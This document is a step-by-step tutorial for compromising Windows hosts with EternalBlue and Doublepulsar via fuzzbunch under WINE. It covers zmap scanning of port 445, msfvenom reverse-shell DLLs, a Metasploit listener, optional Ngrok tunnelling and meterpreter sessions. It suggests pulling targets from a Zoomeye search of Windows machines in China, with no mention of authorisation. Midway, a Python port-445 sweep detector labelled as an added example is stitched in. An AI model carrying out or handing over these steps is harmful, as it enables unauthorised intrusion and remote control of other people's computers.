Step‑by‑Step Guide to Setting Up MSF, Fuzzbunch, and Exploiting EternalBlue on Linux/macOS

This tutorial walks you through installing Metasploit Framework, configuring WINE, setting up Python and fuzzbunch, scanning your network with Zmap, and finally executing the EternalBlue exploit using MSF and Doublepulsar, complete with command examples and troubleshooting tips.

MaGe Linux Operations

Install Metasploit Framework (MSF)

Follow the official installation instructions for Linux or macOS. After installation, run msfconsole to verify that the console starts without errors.

Install WINE and winetricks

Linux

macOS

Install Windows Python environment

Run the Windows installer inside WINE and follow the wizard to completion.

Copy the toolset to the Windows partition

The default WINE virtual drive is ~/.wine/drive_c. Rename the windows folder inside the toolset (e.g., to tools) and copy it to ~/.wine/drive_c/tools.

Enter Win CMD

Launch the WINE command prompt. If you encounter a "wrong font" error, install the fonts-wine package or run winetricks --gui and enable corefonts. Adjust the console font via Properties → Font and test the Python installation with python --version.

Modify fuzzbunch default configuration

Edit ~/.wine/drive_c/tools/fuzzbunch.xml and change ResourcesDir to C:\tools\Resources and LogDir to C:\logs.

Run fuzzbunch

From the WINE CMD, change to the Python directory and execute the provided command (image shown). If the output matches the screenshot, the environment is ready.

Check network settings

Run the following command on the host to obtain the IP address and subnet mask:

ifconfig # or ip addr show

Record the values for later use.

Install Zmap (fast network scanner)

Linux

macOS

Verify the installation with sudo zmap --version.

Scan your subnet

Convert the subnet mask to CIDR notation (e.g., 255.255.192.0 → /18) and run:

sudo zmap -B 10M -p 445 -o 445.csv -i eth0 10.128.129.45/18

Adjust the -B bandwidth option to suit your internal network. If you encounter a blacklist error, edit /etc/zmap/blacklist.conf to comment out internal addresses. Use -i <interface> to select the correct NIC and -G <gateway MAC> if required.
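Seen from the monitoring side, a sweep like the one above shows up as one source sending SYNs to port 445 on many distinct addresses within a few seconds. The following is an added example, not part of the original article: a sliding-window detector run over constructed firewall log lines. The log format, addresses, threshold and window are all assumptions.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Hypothetical log format: "<ISO time> SYN <src> -> <dst>:<port>"
LINE_RE = re.compile(r"^(\S+) SYN (\S+) -> (\S+):(\d+)$")

# Constructed sample: one sweeping host, one ordinary file-server client,
# and one host whose few SMB connections are minutes apart.
SAMPLE_LOG = """\
2024-05-01T09:00:00 SYN 10.128.130.7 -> 10.128.128.10:445
2024-05-01T09:00:01 SYN 10.128.129.45 -> 10.128.128.1:445
2024-05-01T09:00:01 SYN 10.128.129.45 -> 10.128.128.2:445
2024-05-01T09:00:02 SYN 10.128.129.45 -> 10.128.128.3:445
2024-05-01T09:00:02 SYN 10.128.130.7 -> 10.128.128.10:445
2024-05-01T09:00:03 SYN 10.128.129.45 -> 10.128.128.4:445
2024-05-01T09:00:03 SYN 10.128.129.45 -> 10.128.128.5:445
2024-05-01T09:00:04 SYN 10.128.129.45 -> 10.128.128.6:445
2024-05-01T09:00:05 SYN 10.128.131.9 -> 10.128.128.10:443
2024-05-01T09:05:00 SYN 10.128.131.9 -> 10.128.128.10:445
2024-05-01T09:10:00 SYN 10.128.131.9 -> 10.128.128.11:445
"""

def find_smb_sweepers(lines, min_targets=5, window=timedelta(seconds=10), port=445):
    """Return {source: peak distinct destinations} for every source that sent
    SYNs to `port` on at least `min_targets` distinct hosts inside one window.
    Lines are assumed to be in time order."""
    recent = defaultdict(deque)  # source -> (time, destination) pairs still in window
    peaks = {}
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m or int(m.group(4)) != port:
            continue  # unparsable line or a different service
        ts = datetime.fromisoformat(m.group(1))
        src, dst = m.group(2), m.group(3)
        q = recent[src]
        q.append((ts, dst))
        while ts - q[0][0] > window:  # drop events older than the window
            q.popleft()
        distinct = len({d for _, d in q})
        if distinct >= min_targets:
            peaks[src] = max(peaks.get(src, 0), distinct)
    return peaks

if __name__ == "__main__":
    for src, n in find_smb_sweepers(SAMPLE_LOG.splitlines()).items():
        print(f"possible SMB sweep from {src}: {n} distinct targets on 445/tcp")
```

Tune the threshold and window against normal file-server traffic in your environment before alerting on the result.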

Alternative: Zoomeye

If the subnet scan returns no results, you can search the Internet using Zoomeye (https://www.zoomeye.org/) with the query service:microsoft-ds os:windows country:china (optionally add city:beijing) and manually populate 445.csv with the discovered IPs.

Vulnerability scanning with Metasploit

Start msfconsole and load the SMB version scanner:

use auxiliary/scanner/smb/smb_version

Set the target list with set RHOSTS 10.158.24.2 (or your own list) and adjust THREADS as needed, then run exploit. View discovered hosts with hosts. For deeper checks, use auxiliary/scanner/smb/smb_ms17_010.

Run fuzzbunch

Launch the WINE CMD, start Python, and run fuzzbunch. Provide the target IP, set Callback IP to 127.0.0.1, answer no to the third prompt, and accept defaults for the rest. The prompt fb > indicates successful configuration.

EternalBlue attack

Within fuzzbunch, load the EternalBlue module:

use Eternalblue

Enter the target IP, accept defaults, and choose attack method 1 (FB). Proceed through the interactive prompts; if you see "Triggering free of corrupted buffer" the exploit has likely succeeded.

TCP tunnel (optional)

If you lack a public IP, set up a TCP tunnel (e.g., via Ngrok) and replace LHOST with the tunnel address. For internal networks without restrictions, you can use your own NIC IP directly.

MSF listener for reverse shell

In Metasploit, load the handler with use multi/handler. Choose the appropriate payload:

32‑bit: set payload windows/meterpreter/reverse_tcp
64‑bit: set payload windows/x64/meterpreter/reverse_tcp

Set LHOST 127.0.0.1 (when using a tunnel) and run the handler with exploit -j. View background jobs with jobs -l.

Generate shellcode DLLs

Run the following command inside MSF (replace placeholders):

msfvenom -p {Payload} -f dll -a {ARCH} LHOST={HOST} LPORT={PORT} -o /tmp/payload.dll

Generate both 32‑bit and 64‑bit DLLs and copy them to ~/.wine/drive_c.

Inject Doublepulsar

From the WINE CMD, launch fuzzbunch and select the Doublepulsar module. Choose Proto: SMB, select the correct architecture, then pick option 2 (RunDLL). Provide the path to the generated DLL (e.g., C:\x86.dll or C:\x64.dll) and confirm. A "Success" message indicates successful injection.

Post‑exploitation

Return to MSF and verify that a meterpreter session appears. List sessions with sessions -l and interact with a session using sessions -i <ID>. For basic post‑exploitation commands, refer to the Metasploit Meterpreter documentation.

Conclusion

The steps above cover environment setup, network discovery, vulnerability scanning, exploitation with EternalBlue, and establishing a persistent meterpreter session. Further enumeration and lateral movement are left as an exercise for the reader.
